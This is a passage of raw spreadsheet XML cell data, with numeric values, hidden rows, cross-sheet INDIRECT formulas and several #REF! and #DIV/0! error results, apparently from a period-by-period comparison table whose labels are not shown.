        <v>471.475833333333</v>
      </c>
      <c r="F10" s="25"/>
      <c r="G10" s="25"/>
      <c r="H10" s="25"/>
      <c r="I10" s="25"/>
      <c r="J10" s="25"/>
      <c r="K10" s="25"/>
      <c r="L10" s="25"/>
      <c r="M10" s="25"/>
      <c r="N10" s="22"/>
      <c r="O10" s="22"/>
      <c r="P10" s="22"/>
      <c r="Q10" s="22"/>
      <c r="R10" s="22"/>
    </row>
    <row r="11" hidden="1" spans="3:18">
      <c r="C11" s="21"/>
      <c r="D11" s="22" t="s">
        <v>312</v>
      </c>
      <c r="E11" s="25">
        <v>452.279166666667</v>
      </c>
      <c r="F11" s="25"/>
      <c r="G11" s="25"/>
      <c r="H11" s="25"/>
      <c r="I11" s="25"/>
      <c r="J11" s="25"/>
      <c r="K11" s="25"/>
      <c r="L11" s="25"/>
      <c r="M11" s="25"/>
      <c r="N11" s="22"/>
      <c r="O11" s="22"/>
      <c r="P11" s="22"/>
      <c r="Q11" s="22"/>
      <c r="R11" s="22"/>
    </row>
    <row r="12" hidden="1" spans="3:18">
      <c r="C12" s="21"/>
      <c r="D12" s="22" t="s">
        <v>393</v>
      </c>
      <c r="E12" s="25">
        <v>493.17</v>
      </c>
      <c r="F12" s="25"/>
      <c r="G12" s="25"/>
      <c r="H12" s="25"/>
      <c r="I12" s="25"/>
      <c r="J12" s="25"/>
      <c r="K12" s="25"/>
      <c r="L12" s="25"/>
      <c r="M12" s="25"/>
      <c r="N12" s="22"/>
      <c r="O12" s="22"/>
      <c r="P12" s="22"/>
      <c r="Q12" s="22"/>
      <c r="R12" s="22"/>
    </row>
    <row r="13" hidden="1" spans="3:18">
      <c r="C13" s="21"/>
      <c r="D13" s="22" t="s">
        <v>396</v>
      </c>
      <c r="E13" s="25">
        <v>214.58668161435</v>
      </c>
      <c r="F13" s="25"/>
      <c r="G13" s="25"/>
      <c r="H13" s="25"/>
      <c r="I13" s="25"/>
      <c r="J13" s="25"/>
      <c r="K13" s="25"/>
      <c r="L13" s="25"/>
      <c r="M13" s="25"/>
      <c r="N13" s="22"/>
      <c r="O13" s="22"/>
      <c r="P13" s="22"/>
      <c r="Q13" s="22"/>
      <c r="R13" s="22"/>
    </row>
    <row r="14" hidden="1" spans="3:18">
      <c r="C14" s="21"/>
      <c r="D14" s="22" t="s">
        <v>397</v>
      </c>
      <c r="E14" s="25">
        <v>189.893222177344</v>
      </c>
      <c r="F14" s="25"/>
      <c r="G14" s="25"/>
      <c r="H14" s="25"/>
      <c r="I14" s="25"/>
      <c r="J14" s="25"/>
      <c r="K14" s="25"/>
      <c r="L14" s="25"/>
      <c r="M14" s="25"/>
      <c r="N14" s="22"/>
      <c r="O14" s="22"/>
      <c r="P14" s="22"/>
      <c r="Q14" s="22"/>
      <c r="R14" s="22"/>
    </row>
    <row r="15" hidden="1" spans="3:18">
      <c r="C15" s="21"/>
      <c r="D15" s="22" t="s">
        <v>348</v>
      </c>
      <c r="E15" s="25">
        <v>265.430779915473</v>
      </c>
      <c r="F15" s="25"/>
      <c r="G15" s="25"/>
      <c r="H15" s="25"/>
      <c r="I15" s="25"/>
      <c r="J15" s="25"/>
      <c r="K15" s="25"/>
      <c r="L15" s="25"/>
      <c r="M15" s="25"/>
      <c r="N15" s="22"/>
      <c r="O15" s="22"/>
      <c r="P15" s="22"/>
      <c r="Q15" s="22"/>
      <c r="R15" s="22"/>
    </row>
    <row r="16" ht="12" hidden="1" customHeight="1" spans="3:18">
      <c r="C16" s="21" t="s">
        <v>398</v>
      </c>
      <c r="D16" s="22" t="s">
        <v>352</v>
      </c>
      <c r="E16" s="25">
        <v>44.1816666666667</v>
      </c>
      <c r="F16" s="25"/>
      <c r="G16" s="25"/>
      <c r="H16" s="25"/>
      <c r="I16" s="25"/>
      <c r="J16" s="25"/>
      <c r="K16" s="25"/>
      <c r="L16" s="25"/>
      <c r="M16" s="25"/>
      <c r="N16" s="22"/>
      <c r="O16" s="22"/>
      <c r="P16" s="22"/>
      <c r="Q16" s="22"/>
      <c r="R16" s="22"/>
    </row>
    <row r="17" hidden="1" spans="3:18">
      <c r="C17" s="21"/>
      <c r="D17" s="22" t="s">
        <v>312</v>
      </c>
      <c r="E17" s="25">
        <v>40.4858333333333</v>
      </c>
      <c r="F17" s="25"/>
      <c r="G17" s="25"/>
      <c r="H17" s="25"/>
      <c r="I17" s="25"/>
      <c r="J17" s="25"/>
      <c r="K17" s="25"/>
      <c r="L17" s="25"/>
      <c r="M17" s="25"/>
      <c r="N17" s="22"/>
      <c r="O17" s="22"/>
      <c r="P17" s="22"/>
      <c r="Q17" s="22"/>
      <c r="R17" s="22"/>
    </row>
    <row r="18" hidden="1" spans="3:18">
      <c r="C18" s="21"/>
      <c r="D18" s="22" t="s">
        <v>393</v>
      </c>
      <c r="E18" s="25">
        <v>46.325</v>
      </c>
      <c r="F18" s="25"/>
      <c r="G18" s="25"/>
      <c r="H18" s="25"/>
      <c r="I18" s="25"/>
      <c r="J18" s="25"/>
      <c r="K18" s="25"/>
      <c r="L18" s="25"/>
      <c r="M18" s="25"/>
      <c r="N18" s="22"/>
      <c r="O18" s="22"/>
      <c r="P18" s="22"/>
      <c r="Q18" s="22"/>
      <c r="R18" s="22"/>
    </row>
    <row r="19" hidden="1" spans="3:18">
      <c r="C19" s="21"/>
      <c r="D19" s="22" t="s">
        <v>396</v>
      </c>
      <c r="E19" s="25">
        <v>44.8668604163701</v>
      </c>
      <c r="F19" s="25"/>
      <c r="G19" s="25"/>
      <c r="H19" s="25"/>
      <c r="I19" s="25"/>
      <c r="J19" s="25"/>
      <c r="K19" s="25"/>
      <c r="L19" s="25"/>
      <c r="M19" s="25"/>
      <c r="N19" s="22"/>
      <c r="O19" s="22"/>
      <c r="P19" s="22"/>
      <c r="Q19" s="22"/>
      <c r="R19" s="22"/>
    </row>
    <row r="20" hidden="1" spans="3:18">
      <c r="C20" s="21"/>
      <c r="D20" s="22" t="s">
        <v>397</v>
      </c>
      <c r="E20" s="25">
        <v>13.0012274531669</v>
      </c>
      <c r="F20" s="25"/>
      <c r="G20" s="25"/>
      <c r="H20" s="25"/>
      <c r="I20" s="25"/>
      <c r="J20" s="25"/>
      <c r="K20" s="25"/>
      <c r="L20" s="25"/>
      <c r="M20" s="25"/>
      <c r="N20" s="22"/>
      <c r="O20" s="22"/>
      <c r="P20" s="22"/>
      <c r="Q20" s="22"/>
      <c r="R20" s="22"/>
    </row>
    <row r="21" hidden="1" spans="3:18">
      <c r="C21" s="21"/>
      <c r="D21" s="22" t="s">
        <v>348</v>
      </c>
      <c r="E21" s="25">
        <v>17.3977517248402</v>
      </c>
      <c r="F21" s="25"/>
      <c r="G21" s="25"/>
      <c r="H21" s="25"/>
      <c r="I21" s="25"/>
      <c r="J21" s="25"/>
      <c r="K21" s="25"/>
      <c r="L21" s="25"/>
      <c r="M21" s="25"/>
      <c r="N21" s="22"/>
      <c r="O21" s="22"/>
      <c r="P21" s="22"/>
      <c r="Q21" s="22"/>
      <c r="R21" s="22"/>
    </row>
    <row r="22" customHeight="1" spans="3:18">
      <c r="C22" s="26" t="s">
        <v>399</v>
      </c>
      <c r="D22" s="27" t="s">
        <v>352</v>
      </c>
      <c r="E22" s="28">
        <f>5927.20333333333/24</f>
        <v>246.966805555555</v>
      </c>
      <c r="F22" s="28">
        <v>242.63</v>
      </c>
      <c r="G22" s="28">
        <v>238.99</v>
      </c>
      <c r="H22" s="28">
        <v>241.609166666667</v>
      </c>
      <c r="I22" s="28">
        <v>231.66</v>
      </c>
      <c r="J22" s="28">
        <v>231.54</v>
      </c>
      <c r="K22" s="28">
        <v>247.17</v>
      </c>
      <c r="L22" s="28">
        <v>280.96</v>
      </c>
      <c r="M22" s="28">
        <v>270.050582030565</v>
      </c>
      <c r="N22" s="28">
        <f ca="1">INDIRECT($N$3&amp;"!R13")</f>
        <v>0</v>
      </c>
      <c r="O22" s="29" t="e">
        <f>SUM(#REF!)/7</f>
        <v>#REF!</v>
      </c>
      <c r="P22" s="28">
        <f ca="1">INDIRECT($N$3&amp;"!S13")</f>
        <v>263.636596158273</v>
      </c>
      <c r="Q22" s="28">
        <f ca="1">INDIRECT($N$3&amp;"!T13")</f>
        <v>266.206969721701</v>
      </c>
      <c r="R22" s="30">
        <f ca="1">Q22-M22</f>
        <v>-3.84361230886401</v>
      </c>
    </row>
    <row r="23" customHeight="1" spans="3:18">
      <c r="C23" s="26"/>
      <c r="D23" s="31" t="s">
        <v>400</v>
      </c>
      <c r="E23" s="28">
        <f>5594.09333333333/24</f>
        <v>233.087222222222</v>
      </c>
      <c r="F23" s="28">
        <v>233.983881356223</v>
      </c>
      <c r="G23" s="28">
        <v>235.41</v>
      </c>
      <c r="H23" s="28">
        <v>235.135314522805</v>
      </c>
      <c r="I23" s="28">
        <v>230.844601888077</v>
      </c>
      <c r="J23" s="28">
        <v>223.359010334477</v>
      </c>
      <c r="K23" s="28">
        <v>233.340420623498</v>
      </c>
      <c r="L23" s="28">
        <v>244.613314022544</v>
      </c>
      <c r="M23" s="28">
        <v>261.837224559007</v>
      </c>
      <c r="N23" s="28">
        <f ca="1">INDIRECT($N$3&amp;"!R5")</f>
        <v>0</v>
      </c>
      <c r="O23" s="29" t="e">
        <f>SUM(#REF!)/7</f>
        <v>#REF!</v>
      </c>
      <c r="P23" s="28">
        <f ca="1">INDIRECT($N$3&amp;"!S5")</f>
        <v>271.294167565063</v>
      </c>
      <c r="Q23" s="28">
        <f ca="1">INDIRECT($N$3&amp;"!T5")</f>
        <v>260.421411059556</v>
      </c>
      <c r="R23" s="30">
        <f ca="1" t="shared" ref="R23:R28" si="0">Q23-M23</f>
        <v>-1.41581349945096</v>
      </c>
    </row>
    <row r="24" customHeight="1" spans="3:18">
      <c r="C24" s="26"/>
      <c r="D24" s="31" t="s">
        <v>401</v>
      </c>
      <c r="E24" s="28"/>
      <c r="F24" s="28"/>
      <c r="G24" s="28"/>
      <c r="H24" s="28"/>
      <c r="I24" s="28"/>
      <c r="J24" s="28">
        <v>205.7944190801</v>
      </c>
      <c r="K24" s="28">
        <v>240.677695877768</v>
      </c>
      <c r="L24" s="28">
        <v>246.330073493236</v>
      </c>
      <c r="M24" s="28">
        <v>246.285040742069</v>
      </c>
      <c r="N24" s="28">
        <f ca="1">INDIRECT($N$3&amp;"!R6")</f>
        <v>0</v>
      </c>
      <c r="O24" s="29" t="e">
        <f>SUM(#REF!)/7</f>
        <v>#REF!</v>
      </c>
      <c r="P24" s="28">
        <f ca="1">INDIRECT($N$3&amp;"!S6")</f>
        <v>0</v>
      </c>
      <c r="Q24" s="28">
        <f ca="1">INDIRECT($N$3&amp;"!T6")</f>
        <v>240.280205356462</v>
      </c>
      <c r="R24" s="30">
        <f ca="1" t="shared" si="0"/>
        <v>-6.00483538560698</v>
      </c>
    </row>
    <row r="25" ht="13.5" customHeight="1" spans="3:18">
      <c r="C25" s="26"/>
      <c r="D25" s="31" t="s">
        <v>402</v>
      </c>
      <c r="E25" s="28">
        <f>2868.432/24</f>
        <v>119.518</v>
      </c>
      <c r="F25" s="28">
        <v>121.918289834989</v>
      </c>
      <c r="G25" s="28">
        <v>119.71</v>
      </c>
      <c r="H25" s="28">
        <v>121.093633310035</v>
      </c>
      <c r="I25" s="28">
        <v>116.919642950632</v>
      </c>
      <c r="J25" s="28">
        <v>116.809170982236</v>
      </c>
      <c r="K25" s="28">
        <v>113.471134162827</v>
      </c>
      <c r="L25" s="28">
        <v>112.603568436464</v>
      </c>
      <c r="M25" s="28">
        <v>118.141411987105</v>
      </c>
      <c r="N25" s="28">
        <f ca="1">INDIRECT($N$3&amp;"!R19")</f>
        <v>1e-5</v>
      </c>
      <c r="O25" s="29" t="e">
        <f>SUM(#REF!)/7</f>
        <v>#REF!</v>
      </c>
      <c r="P25" s="28">
        <f ca="1">INDIRECT($N$3&amp;"!S19")</f>
        <v>1e-5</v>
      </c>
      <c r="Q25" s="28">
        <f ca="1">INDIRECT($N$3&amp;"!T19")</f>
        <v>9.16666666666667e-6</v>
      </c>
      <c r="R25" s="30"/>
    </row>
    <row r="26" ht="16.5" customHeight="1" spans="3:18">
      <c r="C26" s="26"/>
      <c r="D26" s="31" t="s">
        <v>403</v>
      </c>
      <c r="E26" s="28"/>
      <c r="F26" s="28"/>
      <c r="G26" s="28"/>
      <c r="H26" s="28"/>
      <c r="I26" s="28">
        <v>224.597623568957</v>
      </c>
      <c r="J26" s="28">
        <v>247.380514396017</v>
      </c>
      <c r="K26" s="28">
        <v>254.52192163796</v>
      </c>
      <c r="L26" s="28">
        <v>255.360895066855</v>
      </c>
      <c r="M26" s="28">
        <v>243.886765637548</v>
      </c>
      <c r="N26" s="28">
        <f ca="1">INDIRECT($N$3&amp;"!R20")</f>
        <v>231.197073700122</v>
      </c>
      <c r="O26" s="29" t="e">
        <f>SUM(#REF!)/7</f>
        <v>#REF!</v>
      </c>
      <c r="P26" s="28">
        <f ca="1">INDIRECT($N$3&amp;"!S20")</f>
        <v>211.912182720452</v>
      </c>
      <c r="Q26" s="28">
        <f ca="1">INDIRECT($N$3&amp;"!T20")</f>
        <v>238.0265535972</v>
      </c>
      <c r="R26" s="30">
        <f ca="1" t="shared" si="0"/>
        <v>-5.86021204034799</v>
      </c>
    </row>
    <row r="27" customHeight="1" spans="3:18">
      <c r="C27" s="26"/>
      <c r="D27" s="27" t="s">
        <v>348</v>
      </c>
      <c r="E27" s="28">
        <f>2819.28/24</f>
        <v>117.47</v>
      </c>
      <c r="F27" s="28">
        <v>117.676079195067</v>
      </c>
      <c r="G27" s="28">
        <v>114.56</v>
      </c>
      <c r="H27" s="28">
        <v>116.210862828755</v>
      </c>
      <c r="I27" s="28">
        <v>120.336642660154</v>
      </c>
      <c r="J27" s="28">
        <v>117.667931144803</v>
      </c>
      <c r="K27" s="28">
        <v>119.732790331056</v>
      </c>
      <c r="L27" s="28">
        <v>0</v>
      </c>
      <c r="M27" s="28">
        <v>0</v>
      </c>
      <c r="N27" s="28">
        <f ca="1">INDIRECT($N$3&amp;"!R17")</f>
        <v>0</v>
      </c>
      <c r="O27" s="29" t="e">
        <f>SUM(#REF!)/7</f>
        <v>#REF!</v>
      </c>
      <c r="P27" s="28">
        <f ca="1">INDIRECT($N$3&amp;"!S17")</f>
        <v>0</v>
      </c>
      <c r="Q27" s="28">
        <f ca="1">INDIRECT($N$3&amp;"!T17")</f>
        <v>0</v>
      </c>
      <c r="R27" s="30">
        <f ca="1" t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="28" customHeight="1" spans="3:18">
      <c r="C28" s="32" t="s">
        <v>404</v>
      </c>
      <c r="D28" s="33" t="s">
        <v>352</v>
      </c>
      <c r="E28" s="34">
        <v>143.685290253943</v>
      </c>
      <c r="F28" s="34">
        <v>136.127278593949</v>
      </c>
      <c r="G28" s="34">
        <v>141.71</v>
      </c>
      <c r="H28" s="34">
        <v>141.715704565201</v>
      </c>
      <c r="I28" s="34">
        <v>135.592252830645</v>
      </c>
      <c r="J28" s="34">
        <v>139.711797031969</v>
      </c>
      <c r="K28" s="34">
        <v>141.256943853003</v>
      </c>
      <c r="L28" s="34">
        <v>121.610768069369</v>
      </c>
      <c r="M28" s="34">
        <v>125.202664836564</v>
      </c>
      <c r="N28" s="34" t="e">
        <f ca="1">(INDIRECT($N$3&amp;"!W41")+INDIRECT($N$3&amp;"!W42"))/INDIRECT($N$3&amp;"!G32")*1000</f>
        <v>#DIV/0!</v>
      </c>
      <c r="O28" s="35" t="e">
        <f>SUM(#REF!)/7</f>
        <v>#REF!</v>
      </c>
      <c r="P28" s="34">
        <f ca="1">(INDIRECT($N$3&amp;"!X41")+INDIRECT($N$3&amp;"!X42"))/INDIRECT($N$3&amp;"!H32")*1000</f>
        <v>129.829054853794</v>
      </c>
      <c r="Q28" s="34">
        <f ca="1">(INDIRECT($N$3&amp;"!Y41")+INDIRECT($N$3&amp;"!Y42"))/INDIRECT($N$3&amp;"!I32")*1000</f>
        <v>132.350695958163</v>
      </c>
      <c r="R28" s="36">
        <f ca="1" t="shared" si="0"/>
        <v>7.14803112159942</v>
      </c>
    </row>
    <row r="29" customHeight="1" spans="3:18">
      <c r="C29" s="32"/>
      <c r="D29" s="33" t="s">
        <v>400</v>
      </c>
      <c r="E29" s="34">
        <v>121.496073541263</v>
      </c>
      <c r="F29" s="34">
        <v>127.473959429587</v>
      </c>
      <c r="G29" s="34">
        <v>129.85</v>
      </c>
      <c r="H29" s="34">
        <v>133.095755149195</v>
      </c>
      <c r="I29" s="34">
        <v>129.578000358211</v>
      </c>
      <c r="J29" s="34">
        <v>139.522285437974</v>
      </c>
      <c r="K29" s="34">
        <v>140.907573951156</v>
      </c>
      <c r="L29" s="34">
        <v>136.510998902219</v>
      </c>
      <c r="M29" s="34">
        <v>121.896102811974</v>
      </c>
      <c r="N29" s="34" t="e">
        <f>('[10]31'!$V$8+'[10]31'!$V$11)/'[10]31'!$E$18*1000</f>
        <v>#DIV/0!</v>
      </c>
      <c r="O29" s="34" t="e">
        <f>('[10]31'!$V$8+'[10]31'!$V$11)/'[10]31'!$E$18*1000</f>
        <v>#DIV/0!</v>
      </c>
      <c r="P29" s="34">
        <f>('[10]31'!$W$8+'[10]31'!$W$11)/'[10]31'!$F$18*1000</f>
        <v>124.609000957549</v>
      </c>
      <c r="Q29" s="34">
        <f>('[10]31'!$X$8+'[10]31'!$X$11)/'[10]31'!$G$18*1000</f>
        <v>126.395394029487</v>
      </c>
      <c r="R29" s="36">
        <f t="shared" ref="R29:R32" si="1">Q29-M29</f>
        <v>4.49929121751259</v>
      </c>
    </row>
    <row r="30" customHeight="1" spans="3:18">
      <c r="C30" s="32"/>
      <c r="D30" s="33" t="s">
        <v>401</v>
      </c>
      <c r="E30" s="34"/>
      <c r="F30" s="34"/>
      <c r="G30" s="34"/>
      <c r="H30" s="34"/>
      <c r="I30" s="34"/>
      <c r="J30" s="34">
        <v>152.493539759064</v>
      </c>
      <c r="K30" s="34">
        <v>138.212706122795</v>
      </c>
      <c r="L30" s="34">
        <v>131.045442063871</v>
      </c>
      <c r="M30" s="34">
        <v>122.365661206552</v>
      </c>
      <c r="N30" s="34" t="e">
        <f>('[10]31'!$V$9+'[10]31'!$V$12)/'[10]31'!$E$19*1000</f>
        <v>#DIV/0!</v>
      </c>
      <c r="O30" s="34" t="e">
        <f>('[10]31'!$V$9+'[10]31'!$V$12)/'[10]31'!$E$19*1000</f>
        <v>#DIV/0!</v>
      </c>
      <c r="P30" s="34" t="e">
        <f>('[10]31'!$W$9+'[10]31'!$W$12)/'[10]31'!$F$19*1000</f>
        <v>#DIV/0!</v>
      </c>
      <c r="Q30" s="34">
        <f>('[10]31'!$X$9+'[10]31'!$X$12)/'[10]31'!$G$19*1000</f>
        <v>126.592017787009</v>
      </c>
      <c r="R30" s="36">
        <f t="shared" si="1"/>
        <v>4.22635658045735</v>
      </c>
    </row>
    <row r="31" ht="13.5" customHeight="1" spans="3:18">
      <c r="C31" s="32"/>
      <c r="D31" s="37" t="s">
        <v>402</v>
      </c>
      <c r="E31" s="34">
        <v>140.895</v>
      </c>
      <c r="F31" s="34">
        <v>145.28</v>
      </c>
      <c r="G31" s="34">
        <v>142.43</v>
      </c>
      <c r="H31" s="34">
        <v>141.879965055997</v>
      </c>
      <c r="I31" s="34">
        <v>141.501068724625</v>
      </c>
      <c r="J31" s="34">
        <v>138.892946379769</v>
      </c>
      <c r="K31" s="34">
        <v>143.045493981616</v>
      </c>
      <c r="L31" s="34">
        <v>134.301172105114</v>
      </c>
      <c r="M31" s="34">
        <v>133.603031544448</v>
      </c>
      <c r="N31" s="34">
        <f>'[13]31'!$V$9/'[13]31'!$E$20*1000</f>
        <v>0</v>
      </c>
      <c r="O31" s="35" t="e">
        <f>SUM(#REF!)/7</f>
        <v>#REF!</v>
      </c>
      <c r="P31" s="34">
        <f>'[13]31'!$W$9/'[13]31'!$F$20*1000</f>
        <v>0</v>
      </c>
      <c r="Q31" s="34">
        <f>'[13]31'!$X$9/'[13]31'!$G$20*1000</f>
        <v>0</v>
      </c>
      <c r="R31" s="36"/>
    </row>
    <row r="32" customHeight="1" spans="3:18">
      <c r="C32" s="32"/>
      <c r="D32" s="37" t="s">
        <v>403</v>
      </c>
      <c r="E32" s="34"/>
      <c r="F32" s="34"/>
      <c r="G32" s="34"/>
      <c r="H32" s="34"/>
      <c r="I32" s="34">
        <v>152.926153244815</v>
      </c>
      <c r="J32" s="34">
        <v>134.837449702147</v>
      </c>
      <c r="K32" s="34">
        <v>134.174497802502</v>
      </c>
      <c r="L32" s="34">
        <v>129.876975410217</v>
      </c>
      <c r="M32" s="34">
        <v>121.786482126662</v>
      </c>
      <c r="N32" s="34">
        <f>'[13]31'!$V$10/'[13]31'!$E$21*1000</f>
        <v>125.679209476763</v>
      </c>
      <c r="O32" s="35" t="e">
        <f>SUM(#REF!)/7</f>
        <v>#REF!</v>
      </c>
      <c r="P32" s="34">
        <f>'[13]31'!$W$10/'[13]31'!$F$21*1000</f>
        <v>131.40737463586</v>
      </c>
      <c r="Q32" s="34">
        <f>'[13]31'!$X$10/'[13]31'!$G$21*1000</f>
        <v>128.26740605269</v>
      </c>
      <c r="R32" s="36">
        <f t="shared" si="1"/>
        <v>6.48092392602753</v>
      </c>
    </row>
    <row r="33" customHeight="1" spans="3:18">
      <c r="C33" s="32"/>
      <c r="D33" s="33" t="s">
        <v>348</v>
      </c>
      <c r="E33" s="34">
        <v>141.484840909903</v>
      </c>
      <c r="F33" s="34">
        <v>141.94</v>
      </c>
      <c r="G33" s="34">
        <v>140.63</v>
      </c>
      <c r="H33" s="34">
        <v>137.643677671708</v>
      </c>
      <c r="I33" s="34">
        <v>136.280664497925</v>
      </c>
      <c r="J33" s="34">
        <v>137.386035409354</v>
      </c>
      <c r="K33" s="34">
        <v>138.456406914152</v>
      </c>
      <c r="L33" s="34" t="e">
        <v>#DIV/0!</v>
      </c>
      <c r="M33" s="34" t="e">
        <v>#DIV/0!</v>
      </c>
      <c r="N33" s="34" t="e">
        <f ca="1">(INDIRECT($N$3&amp;"!W46")+INDIRECT($N$3&amp;"!W47"))/INDIRECT($N$3&amp;"!G42")*1000</f>
        <v>#DIV/0!</v>
      </c>
      <c r="O33" s="35" t="e">
        <f>SUM(#REF!)/7</f>
        <v>#REF!</v>
      </c>
      <c r="P33" s="34" t="e">
        <f ca="1">(INDIRECT($N$3&amp;"!X46")+INDIRECT($N$3&amp;"!X47"))/INDIRECT($N$3&amp;"!H42")*1000</f>
        <v>#DIV/0!</v>
      </c>
      <c r="Q33" s="34" t="e">
        <f ca="1">(INDIRECT($N$3&amp;"!Y46")+INDIRECT($N$3&amp;"!Y47"))/INDIRECT($N$3&amp;"!I42")*1000</f>
        <v>#DIV/0!</v>
      </c>
      <c r="R33" s="36"/>
    </row>
    <row r="34" customHeight="1" spans="3:18">
      <c r="C34" s="38" t="s">
        <v>405</v>
      </c>
      <c r="D34" s="39" t="s">
        <v>352</v>
      </c>
      <c r="E34" s="40">
        <v>28.5055530067334</v>
      </c>
      <c r="F34" s="40">
        <v>23.22</v>
      </c>
      <c r="G34" s="40">
        <v>26</v>
      </c>
      <c r="H34" s="40">
        <v>29.73</v>
      </c>
      <c r="I34" s="40">
        <v>30.69</v>
      </c>
      <c r="J34" s="40">
        <v>32.22</v>
      </c>
      <c r="K34" s="40">
        <v>32.89</v>
      </c>
      <c r="L34" s="40">
        <v>26.71</v>
      </c>
      <c r="M34" s="40">
        <v>27.2722339748385</v>
      </c>
      <c r="N34" s="40">
        <f ca="1">INDIRECT($N$3&amp;"!R27")</f>
        <v>0</v>
      </c>
      <c r="O34" s="41" t="e">
        <f>SUM(#REF!)/7</f>
        <v>#REF!</v>
      </c>
      <c r="P34" s="40">
        <f ca="1">INDIRECT($N$3&amp;"!S27")</f>
        <v>22.5925764408544</v>
      </c>
      <c r="Q34" s="40">
        <f ca="1">INDIRECT($N$3&amp;"!T27")</f>
        <v>25.1966540548776</v>
      </c>
      <c r="R34" s="42">
        <f ca="1">Q34-M34</f>
        <v>-2.0755799199609</v>
      </c>
    </row>
    <row r="35" customHeight="1" spans="3:18">
      <c r="C35" s="43"/>
      <c r="D35" s="44" t="s">
        <v>400</v>
      </c>
      <c r="E35" s="40">
        <v>29.6063625179646</v>
      </c>
      <c r="F35" s="40">
        <v>25.0774042842402</v>
      </c>
      <c r="G35" s="40">
        <v>28.36</v>
      </c>
      <c r="H35" s="40">
        <v>28.0562716287946</v>
      </c>
      <c r="I35" s="40">
        <v>30.1036274203166</v>
      </c>
      <c r="J35" s="40">
        <v>34.2429188832046</v>
      </c>
      <c r="K35" s="40">
        <v>33.764539689544</v>
      </c>
      <c r="L35" s="40">
        <v>29.6515977115377</v>
      </c>
      <c r="M35" s="40">
        <v>24.2865654159885</v>
      </c>
      <c r="N35" s="40">
        <f ca="1">INDIRECT($N$3&amp;"!R28")</f>
        <v>0</v>
      </c>
      <c r="O35" s="41" t="e">
        <f>SUM(#REF!)/7</f>
        <v>#REF!</v>
      </c>
      <c r="P35" s="40">
        <f ca="1">INDIRECT($N$3&amp;"!S28")</f>
        <v>28.3179061602293</v>
      </c>
      <c r="Q35" s="40">
        <f ca="1">INDIRECT($N$3&amp;"!T28")</f>
        <v>26.0491177026315</v>
      </c>
      <c r="R35" s="42">
        <f ca="1" t="shared" ref="R35:R39" si="2">Q35-M35</f>
        <v>1.762552286643</v>
      </c>
    </row>
    <row r="36" customHeight="1" spans="3:18">
      <c r="C36" s="43"/>
      <c r="D36" s="44" t="s">
        <v>401</v>
      </c>
      <c r="E36" s="40"/>
      <c r="F36" s="40"/>
      <c r="G36" s="40"/>
      <c r="H36" s="40"/>
      <c r="I36" s="40"/>
      <c r="J36" s="40"/>
      <c r="K36" s="40">
        <v>31.1531467666446</v>
      </c>
      <c r="L36" s="40">
        <v>31.548484378101</v>
      </c>
      <c r="M36" s="40">
        <v>28.9137946381077</v>
      </c>
      <c r="N36" s="40">
        <f ca="1">INDIRECT($N$3&amp;"!R29")</f>
        <v>0</v>
      </c>
      <c r="O36" s="41" t="e">
        <f>SUM(#REF!)/7</f>
        <v>#REF!</v>
      </c>
      <c r="P36" s="40">
        <f ca="1">INDIRECT($N$3&amp;"!S29")</f>
        <v>0</v>
      </c>
      <c r="Q36" s="40">
        <f ca="1">INDIRECT($N$3&amp;"!T29")</f>
        <v>29.9342377123697</v>
      </c>
      <c r="R36" s="42">
        <f ca="1" t="shared" si="2"/>
        <v>1.020443074262</v>
      </c>
    </row>
    <row r="37" customHeight="1" spans="3:18">
      <c r="C37" s="43"/>
      <c r="D37" s="44" t="s">
        <v>402</v>
      </c>
      <c r="E37" s="40">
        <v>34.7</v>
      </c>
      <c r="F37" s="40">
        <v>28.1774036603705</v>
      </c>
      <c r="G37" s="40">
        <v>27.93</v>
      </c>
      <c r="H37" s="40">
        <v>29.0011717745683</v>
      </c>
      <c r="I37" s="40">
        <v>29.96</v>
      </c>
      <c r="J37" s="40">
        <v>31.1</v>
      </c>
      <c r="K37" s="40">
        <v>32.36</v>
      </c>
      <c r="L37" s="40">
        <v>26.11</v>
      </c>
      <c r="M37" s="40">
        <v>26.08</v>
      </c>
      <c r="N37" s="40">
        <f ca="1">INDIRECT($N$3&amp;"!R32")</f>
        <v>0</v>
      </c>
      <c r="O37" s="41" t="e">
        <f>SUM(#REF!)/7</f>
        <v>#REF!</v>
      </c>
      <c r="P37" s="40">
        <f ca="1">INDIRECT($N$3&amp;"!S32")</f>
        <v>0</v>
      </c>
      <c r="Q37" s="40">
        <f ca="1">INDIRECT($N$3&amp;"!T32")</f>
        <v>0</v>
      </c>
      <c r="R37" s="42"/>
    </row>
    <row r="38" customHeight="1" spans="3:18">
      <c r="C38" s="43"/>
      <c r="D38" s="44" t="s">
        <v>403</v>
      </c>
      <c r="E38" s="40"/>
      <c r="F38" s="40"/>
      <c r="G38" s="40"/>
      <c r="H38" s="40">
        <v>0</v>
      </c>
      <c r="I38" s="40">
        <v>0</v>
      </c>
      <c r="J38" s="40">
        <v>19.96</v>
      </c>
      <c r="K38" s="40">
        <v>21.82</v>
      </c>
      <c r="L38" s="40">
        <v>21.09</v>
      </c>
      <c r="M38" s="40">
        <v>20.6499027689894</v>
      </c>
      <c r="N38" s="40">
        <f ca="1">INDIRECT($N$3&amp;"!R33")</f>
        <v>21.89</v>
      </c>
      <c r="O38" s="41" t="e">
        <f>SUM(#REF!)/7</f>
        <v>#REF!</v>
      </c>
      <c r="P38" s="40">
        <f ca="1">INDIRECT($N$3&amp;"!S33")</f>
        <v>21.1</v>
      </c>
      <c r="Q38" s="40">
        <f ca="1">INDIRECT($N$3&amp;"!T33")</f>
        <v>19.83</v>
      </c>
      <c r="R38" s="42">
        <f ca="1" t="shared" si="2"/>
        <v>-0.819902768989401</v>
      </c>
    </row>
    <row r="39" customHeight="1" spans="3:18">
      <c r="C39" s="45"/>
      <c r="D39" s="39" t="s">
        <v>348</v>
      </c>
      <c r="E39" s="40">
        <v>24.7890107012344</v>
      </c>
      <c r="F39" s="40">
        <v>17.5251125398157</v>
      </c>
      <c r="G39" s="40">
        <v>20.95</v>
      </c>
      <c r="H39" s="40">
        <v>22.44864162896</v>
      </c>
      <c r="I39" s="40">
        <v>19.6317127990618</v>
      </c>
      <c r="J39" s="40">
        <v>24.2922790804848</v>
      </c>
      <c r="K39" s="40">
        <v>27.0195887029228</v>
      </c>
      <c r="L39" s="40">
        <v>0</v>
      </c>
      <c r="M39" s="40">
        <v>0</v>
      </c>
      <c r="N39" s="40">
        <f ca="1">INDIRECT($N$3&amp;"!R30")</f>
        <v>0</v>
      </c>
      <c r="O39" s="41" t="e">
        <f>SUM(#REF!)/7</f>
